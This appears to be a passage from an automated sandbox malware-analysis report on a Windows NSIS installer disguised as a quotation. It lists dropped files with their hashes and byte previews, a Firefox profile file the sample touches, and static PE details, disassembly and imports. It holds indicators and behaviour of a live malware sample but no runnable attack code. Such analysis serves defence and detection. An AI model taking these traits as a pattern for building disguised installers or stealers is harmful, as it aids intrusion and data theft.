                                                                                                                MD5:DD87A973E01C5D9F8E0FCC81A0AF7C7A
                                                                                                                SHA1:C9206CED48D1E5BC648B1D0F54CCCC18BF643A14
                                                                                                                SHA-256:7FB0F8D452FEFAAC789986B933DF050F3D3E4FEB8A8D9944ADA995F572DCDCA1
                                                                                                                SHA-512:4910B39B1A99622AC8B3C42F173BBE7035AC2F8D40C946468E7DB7E2868A2DA81EA94DA453857F06F39957DD690C7F1BA498936A7AAA0039975E472376F92E8F
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: Teosofis.exe, Detection: malicious, Browse
                                                                                                                • Filename: Appetisement56.exe, Detection: malicious, Browse
                                                                                                                • Filename: Sparkler.exe, Detection: malicious, Browse
                                                                                                                • Filename: Revived.exe, Detection: malicious, Browse
                                                                                                                • Filename: Graphitoid.exe, Detection: malicious, Browse
                                                                                                                • Filename: Teosofis.exe, Detection: malicious, Browse
                                                                                                                • Filename: Sparkler.exe, Detection: malicious, Browse
                                                                                                                • Filename: Appetisement56.exe, Detection: malicious, Browse
                                                                                                                • Filename: Revived.exe, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L...N.d...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...h....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dll

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6656
                                                                                                                Entropy (8bit):5.179045770990221
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:6C881F00BA860B17821D8813AA34DBC6
                                                                                                                SHA1:0E5A1E09B1CE1BC758D6977B913A8D9CCBE52A13
                                                                                                                SHA-256:BCB93204BD1854D0C34FA30883BAB51F6813AB32ABF7FB7D4AEED21D71F6AF87
                                                                                                                SHA-512:C78D6F43AA9BB35260A7BD300392CE809282660283FA6CB3059BAE50D6DB229B0B853CAB7C949D4BDF19309FB183257B1C9FEB01A66347E1C0ADEB21543315B6
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: SOuJyjzbcV.exe, Detection: malicious, Browse
                                                                                                                • Filename: goCj2yHUGx.exe, Detection: malicious, Browse
                                                                                                                • Filename: FcMubiUTN1.exe, Detection: malicious, Browse
                                                                                                                • Filename: oEijqRFE2K.exe, Detection: malicious, Browse
                                                                                                                • Filename: SOuJyjzbcV.exe, Detection: malicious, Browse
                                                                                                                • Filename: goCj2yHUGx.exe, Detection: malicious, Browse
                                                                                                                • Filename: FcMubiUTN1.exe, Detection: malicious, Browse
                                                                                                                • Filename: LM1UOHhZYE.exe, Detection: malicious, Browse
                                                                                                                • Filename: LM1UOHhZYE.exe, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L...L.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\Temp\nsx8070.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1901521
                                                                                                                Entropy (8bit):2.1309615870760013
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:093CE583E71B80F94A30C94906D92846
                                                                                                                SHA1:E7FC4D5B27DD70165A933E96FFB71C89418C5A06
                                                                                                                SHA-256:1DC5F8FCCE3120363BEE8FE820BBDAEB6E14CECF8E198542557734A1717977F1
                                                                                                                SHA-512:ECA97B849591681A7C052671709D99AE48D1159DBE92011553A4CDBF11623311A616AE4C0536084C9FEC79E7B66BC5CDFF4BD534A6B36D60E108645A9514E4BB
                                                                                                                Malicious:false
                                                                                                                Preview:Q"......,................................!......Q"..........................J...............................................................................................................................................................................................................a...e...........k...j...........................................................................................................................................J...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\Temp\sysinfo.txt

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:ISO-8859 text, with very long lines (1240), with CRLF, LF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):54335
                                                                                                                Entropy (8bit):5.606165578281984
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:BBC6827625A36E37DACB6ED2734BF584
                                                                                                                SHA1:41E5066941509F21292BC58EA31B7FDD54698104
                                                                                                                SHA-256:35605DBACA6D63D105456C414968796F06F2AD168966C9F35CF3469F15828EE3
                                                                                                                SHA-512:1D2AD4E0214B3A18274690C07888F2B9DEE99060BD7781E56CB150196DDF6E686C08879974756669A76A1598E51F040C4EE99C34E159FBC531FBFC57B7732565
                                                                                                                Malicious:false
                                                                                                                Preview:------------------..System Information..------------------.. Time of this report: 9/30/2024, 06:08:41.. Machine name: 088753.. Machine Id: Unknown.. Operating System: Windows 10 Pro 64-bit (10.0, Build 19042) (19041.vb_release.191206-1406).. Language: English (Regional Setting: English).. System Manufacturer: To Be Filled By O.E.M... System Model: To Be Filled By O.E.M... BIOS: Default System BIOS (type: UEFI).. Processor: Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz (16 CPUs), ~3.6GHz.. Memory: 16384MB RAM.. Available OS Memory: 15900MB RAM.. Page File: 3374MB used, 28909MB available.. Windows Dir: C:\Windows.. DirectX Version: DirectX 12.. DX Setup Parameters: Not found.. User DPI Setting: 96 DPI (100 percent).. System DPI Setting: 96 DPI (100 percent).. DWM DPI Scaling: Disabled..

                                                                                                                C:\Users\user\AppData\Local\Temp\xadmhfv

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2
                                                                                                                Entropy (8bit):1.0
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                Malicious:false
                                                                                                                Preview:..

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Fodterapeut.Bew

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5545
                                                                                                                Entropy (8bit):4.73182598865843
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:8A7A03C9326FFC560B73C739A897A323
                                                                                                                SHA1:2C86B6D39B2DA8AB87942D450E20F199AA41EB83
                                                                                                                SHA-256:ADB4889CF77CD15AA20D35C6814FC895AE4A2226A84E8341BDFC03959838420F
                                                                                                                SHA-512:36FEE6D2619284B33EDEEF0A890E8FFF27D745B1FC0B18BE1EF9230F47094AF2FA4DA24EF08269C55F55E8AA63A3338930DD258C9650DB45424E0FEC11AFEFE9
                                                                                                                Malicious:false
                                                                                                                Preview:......ww...............bb......\.............}}}...............A......I...........................................................................................................................................................................................................................................................................hh.......QQ.h..b.........'.II.......DD......J.[.........................N.aa.]........................<<.......................ww...........bbbb..Q.................................................GG.......a.ZZ.gg.................*..........k.......CCC.......$$...........................................S....x..............................F..........5...[.jjj..........:.................yyy....................T...=...a.......II..6..Q.............,.........o.............o......KKK.x..BBBB.b.K.......!...###.```....LLLL....nn..hhh...............................I...............GGGG.999...........L......[....gg......

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines\spirographin.sur

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):416801
                                                                                                                Entropy (8bit):1.2548832627710584
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:6D7CAD86AAC0A74C29F3796365622A71
                                                                                                                SHA1:C6567889AEC60BB631D49268A92FCBAA6C153B7F
                                                                                                                SHA-256:4605B20A04549F7FBB2DE2A52AD5BDCCCA2ECC2B055CBF1FFCF4FFFCF3B630BE
                                                                                                                SHA-512:67B4E7F874945309ABAD3EBB4EF3F7B3CC8A1760EC030958CCD1AC5E4AD870A5A4C82EC968E523CC0C674373FAA247CDDC546BECDA596505F92C4A7B7B6177E2
                                                                                                                Malicious:false
                                                                                                                Preview:......................C.................................................................n................H..........................................7...........$...........*..K..........@...6........G................................................................d................3.............>............................4q...$................................................................I..............;.............S.................................................................<.....................d............................................_....I..........................g..........2..........................................p................................................F.....................................g.................................... ......................3........_........q...............................,.Y.........-./...............................o.............g...........................................iR.......................................................

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines\talpatate.luk

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 33554432.000000
                                                                                                                Category:dropped
                                                                                                                Size (bytes):169850
                                                                                                                Entropy (8bit):1.239128128570523
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:5C9D072769D223672E8B8296F37EC4E0
                                                                                                                SHA1:24C03AD82AC8F9A5F3A532E73D9B2D20286A87E7
                                                                                                                SHA-256:99149DF7E611348D78576E332056846C7D8F55D52BADD6F20DF3470668BF2C9B
                                                                                                                SHA-512:D7B406E021A47D967BCA2A915EE85CBBCB56A79833767F3ED02625904BB6CB33B48C84D185E776614E034921B1B316E9BAC0B15C159BCC22472100E6C0D65864
                                                                                                                Malicious:false
                                                                                                                Preview:..................>...h......S..................#.....).....................N..................................................................e....r.....................................................................0.......}...................2._...............................E..........................)...........................................................................^...............................................E...+..................=...............................m............................................Z........................................................o.........-..........G...........D..............................................0............................!.......U..........U........................#................................................................l................................................................................................................................b............S.......................g........%...........,.....

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Overtakes.fly

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):212153
                                                                                                                Entropy (8bit):1.2589215152432
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:C7688273DD442CA5AFAF3620ED9CD5EC
                                                                                                                SHA1:E57D04092BD94EBA3D9712BFB77921B9193D47EC
                                                                                                                SHA-256:B27B92BB984761CB945B257717D3A1E7DF5BD2D7E44F34B31501FB1165CDBA8F
                                                                                                                SHA-512:1AD90075674A1415209C89F2F784CCABE641D667D0BBA59A6A806D377F28D5076BCA72C1B8084A4B4B9F9F288D5790A3C65AC6EB99A5E7F519666C0FC4694499
                                                                                                                Malicious:false
                                                                                                                Preview:........2..........@............................F.P...$........f..............g............................S........N........%.....................@............................................`...R.......=.........P.................o......................................................................T..t...........................>.............1....p..................1........R............................S..........+.............................................b.Z............................M..........`..................g.g.................F..................................................b..................................................................C..n................7...............................=....................................................................!.x.......................................................................................@...........................................=.....................................................H.......................

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Perichord.str

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):427282
                                                                                                                Entropy (8bit):1.2479910345314456
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:5B7F5B5A204CD4C13DFF4D1A2BF3A2FF
                                                                                                                SHA1:C82B59017B12848265F3E5253D7B2C375A642602
                                                                                                                SHA-256:E2E0BF5E5850F022CA997045B11D7CCB9AECE19914280CBA562E2D0500AB32A0
                                                                                                                SHA-512:B62108EA5758D0297D1336B7A5962172AF8F47BD87843ED688D40948667DAB21C963E90767F3C984677E0BCA24E7AA676239271B0151D4E79D2B3FEEAAB2B433
                                                                                                                Malicious:false
                                                                                                                Preview:.................................................................^8........................j...7.....].............................................-.................................g......A...................,.....................t..............................................<.............._............;............................w......6.....................................................v.b..I............................@................................. .a3...........................................................b........................"............................i....h..............0.......................m.............P............................m....................&.........................V..*....~..........n..............................................................................................:..........Y.......W...................................................]........................................................G...........................Z..............

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Septifragal.fla

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8388
                                                                                                                Entropy (8bit):1.226214966040589
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:D8F6164D5B626B750056F5C086263BFE
                                                                                                                SHA1:77BAEA4CD35680E7D8215AB4B8BDD1662C809A70
                                                                                                                SHA-256:593257E9FE0C432305F9DE6641FB76AED417ACE94A0C8E911BA4619CFA6C9D49
                                                                                                                SHA-512:E22D8D09390E0FDFD44AEF0E8D46B1309531B3613C4B59DE76950D303BE1178C0B7950E3D1110A5D0AFA8A26AAFB3ED59C3FB90652680EED6EE187E3857A1F32
                                                                                                                Malicious:false
                                                                                                                Preview:...r..............................................`..3..............................~...........N...................y6%.........)..............6..............................................................................................................................................1......................................../............x...................................................:...............D....................................................m........g........................................V...Z...............................................................................................?......................Z..................4...`..................................'...C................m.................................................................................................`....X........../........................o...........................................................................................^.......................................................

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Sesquihydrated12.txt

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):320
                                                                                                                Entropy (8bit):4.362392769681322
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:031601AA1EF3929271B263AABF32109A
                                                                                                                SHA1:0C40BBCB0943544337A8FADC54B64A07806DD223
                                                                                                                SHA-256:6D1F244D7BF046A00BF753BD308ADC08813A8077FE52D88466989F984CB7F39B
                                                                                                                SHA-512:5F3358204BDAB2C313EA60FBACF10AA1464F431760744804DAF7152391019AEC7C81106CD38DF04D4A7459F36B17EB43B81CCCE009D0D1012E5BC37FB3FEC132
                                                                                                                Malicious:false
                                                                                                                Preview:harmonikasengs bommerters homicide,genitivform indtjenende extracultural brandbomben.kulturkampen ubrdelig immaculateness.adjustive cearin ekspeditrens wiktorias vexatious infrabuccal insertion..cheekless tilkendegiver ministrenes algebraization bundfalds asha.precolours haematoxylin gymnasielrere monachate cliqueless.

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Siskenernes.Mom105

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):161648
                                                                                                                Entropy (8bit):7.713423806850711
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:3B8848BFA32D722E66415A6B52006D53
                                                                                                                SHA1:2159FF7F93EA11FB5727CBC82C3347628FADA0B0
                                                                                                                SHA-256:31AAE243F3FDAD5434B88B0C1C74CDA9E55989991CC56C97A8832F4F7F3EC813
                                                                                                                SHA-512:1A1519249911C5F70DB480A4BAE7E957258E2892A71E7F7821A08E24CFB204B463529E46CB1B78BAE5E39877F5861350CD36D3E2C712C468900E2F392744D7DC
                                                                                                                Malicious:false
                                                                                                                Preview:.................ccc...........6.......00...OO./........aa.i................'......................................w.1..f............TT...........F......P.:............q.......K...r................a....33.======............****........""........]]]]]]....h...........................Z......?..........................{{.....66666......n....E...)...)))..VV....~~...........777..t......|.............n..$$$.......<.......................................Z.....DD.;...........F...U..................3...................-..??.............n.........66................T......jjjjjjjjj......5555......~................vvv.............,..................9....sss.yy.........MMM........S...f...............Ef......NXL....r......f.....^f-uf.........>#k...f...f..f.......|...f....o......X.......00..............8.f...f.....=.Q..........................X..f...f........f...=.tl7..f....y*. ...f..X.......1.f............f..............f!....B..|...f!..f.....;@.......... ....v..f!..Yn.b .f.....|@........

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Terpe.dat

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):471757
                                                                                                                Entropy (8bit):1.25205548882929
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:CF0D2A3273A8B26DB0A56DA0A08A125A
                                                                                                                SHA1:0B4C271C9BB3371D17C3E2014043703339026CE2
                                                                                                                SHA-256:375969793A510667A00C2CFA05960DE73D89525B56ABBEAB7F46D66CA35A3E68
                                                                                                                SHA-512:5C516DD2E0283AFA7636D3D31AAC9A5B4D0EB4657EF62052E81E0E4CBF42382B791DDEA370ECF85A2FAF2856FB0CB45FB95FE8D4959FE5AA223EA6DB0EE48D22
                                                                                                                Malicious:false
                                                                                                                Preview:.....4....................................&.........V......l................................Z.........W.....................................................................................................v..................................C.............2.......=.............................]..................................................................................................................................u...#...............R..o.............8.......u..................9.....c...........................................................(.........l.................z......................... ..........................................=........B..................................#...................D..................................................................p......................M.....'...........................................................n.....[...............*.........................X.....S...d....................................-....................)......>.......

                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite-shm

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32768
                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                Malicious:false
                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                Entropy (8bit):7.750682949543089
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:z1Quotation.scr.exe
                                                                                                                File size:583'221 bytes
                                                                                                                MD5:0a648622633dbd21fef151b525657b2c
                                                                                                                SHA1:49a34b496d78054a1b6404dd04d9be60d071ae52
                                                                                                                SHA256:3cc2813b0ce3a69bd64acdbe194fa68e067a150626cf45e665a27836f39ac39d
                                                                                                                SHA512:4cf0488f7fdea3047994e6ca7ce94febd36c861a45c7765f9b30d194e844f8a9af87b317f6517f585dbcd65494bf013acf7fc96082fb42d22382b897126602f8
                                                                                                                SSDEEP:12288:oXXiVMOWJOcSBkCedZpqPT5YkxBsdQ6jv2:KXiSjJO7B10DqPT5GNT2
                                                                                                                TLSH:75C4010777646835CA3E5AF062B70BCE97684C2B0E11450F2BB97B262DB1317AD1E5CE
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L...e..d.................d...........4............@

                                                                                                                File Icon

                                                                                                                Icon Hash:040709554dcc390f

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x4034d1
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x64A0DC65 [Sun Jul 2 02:09:41 2023 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:0293eec0b5432ad092f24065016203b2

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                sub esp, 00000224h
                                                                                                                push esi
                                                                                                                push edi
                                                                                                                xor edi, edi
                                                                                                                push 00008001h
                                                                                                                mov dword ptr [ebp-14h], edi
                                                                                                                mov dword ptr [ebp-0Ch], 0040A130h
                                                                                                                mov dword ptr [ebp-08h], edi
                                                                                                                mov byte ptr [ebp-04h], 00000020h
                                                                                                                call dword ptr [00408094h]
                                                                                                                mov esi, dword ptr [00408098h]
                                                                                                                lea eax, dword ptr [ebp-000000C4h]
                                                                                                                push eax
                                                                                                                mov dword ptr [ebp-000000B0h], edi
                                                                                                                mov dword ptr [ebp-30h], edi
                                                                                                                mov dword ptr [ebp-2Ch], edi
                                                                                                                mov dword ptr [ebp-000000C4h], 0000009Ch
                                                                                                                call esi
                                                                                                                test eax, eax
                                                                                                                jne 00007F5ACCCA03C1h
                                                                                                                lea eax, dword ptr [ebp-000000C4h]
                                                                                                                mov dword ptr [ebp-000000C4h], 00000094h
                                                                                                                push eax
                                                                                                                call esi
                                                                                                                cmp dword ptr [ebp-000000B4h], 02h
                                                                                                                jne 00007F5ACCCA03ACh
                                                                                                                movsx cx, byte ptr [ebp-000000A3h]
                                                                                                                mov al, byte ptr [ebp-000000B0h]
                                                                                                                sub ecx, 30h
                                                                                                                sub al, 53h
                                                                                                                mov byte ptr [ebp-2Ah], 00000004h
                                                                                                                neg al
                                                                                                                sbb eax, eax
                                                                                                                not eax
                                                                                                                and eax, ecx
                                                                                                                mov word ptr [ebp-30h], ax
                                                                                                                cmp dword ptr [ebp-000000B4h], 02h
                                                                                                                jnc 00007F5ACCCA03A4h
                                                                                                                and byte ptr [ebp-2Ah], 00000000h
                                                                                                                cmp byte ptr [ebp-000000AFh], 00000041h
                                                                                                                jl 00007F5ACCCA0393h
                                                                                                                movsx ax, byte ptr [ebp-000000AFh]
                                                                                                                sub eax, 40h
                                                                                                                mov word ptr [ebp-30h], ax
                                                                                                                jmp 00007F5ACCCA0386h
                                                                                                                mov word ptr [ebp-30h], di
                                                                                                                cmp dword ptr [ebp-000000C0h], 0Ah
                                                                                                                jnc 00007F5ACCCA038Ah
                                                                                                                and word ptr [ebp+00000000h], 0000h

                                                                                                                Rich Headers

                                                                                                                Programming Language:
                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84300xa0.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x14d80.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x294.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x63d10x640083403cf301b935fec3006a8489b7d492False0.66859375data6.443410168182584IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rdata0x80000x12340x14003c475f0d07d8baa23af20787c8b2799bFalse0.4265625data5.027896508511247IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .data0xa0000x1a4580x6009669ccd1d90a83bd841433b38a490114False0.4446614583333333data4.097544530535614IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .ndata0x250000x120000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rsrc0x370000x14d800x14e00b26481608d5ce113503bdb7b7ec08cb5False0.22550991766467066data4.966130506133016IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_ICON0x372680x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.18410623447296817
                                                                                                                RT_ICON0x47a900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.3510373443983402
                                                                                                                RT_ICON0x4a0380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.3698405253283302
                                                                                                                RT_ICON0x4b0e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.49645390070921985
                                                                                                                RT_DIALOG0x4b5480x120dataEnglishUnited States0.5138888888888888
                                                                                                                RT_DIALOG0x4b6680x11cdataEnglishUnited States0.6091549295774648
                                                                                                                RT_DIALOG0x4b7880x60dataEnglishUnited States0.7291666666666666
                                                                                                                RT_GROUP_ICON0x4b7e80x3edataEnglishUnited States0.8387096774193549
                                                                                                                RT_VERSION0x4b8280x214dataEnglishUnited States0.5488721804511278
                                                                                                                RT_MANIFEST0x4ba400x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                ADVAPI32.dllRegEnumValueA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegOpenKeyExA, RegCreateKeyExA
                                                                                                                SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteExA
                                                                                                                ole32.dllOleUninitialize, OleInitialize, IIDFromString, CoCreateInstance, CoTaskMemFree
                                                                                                                COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
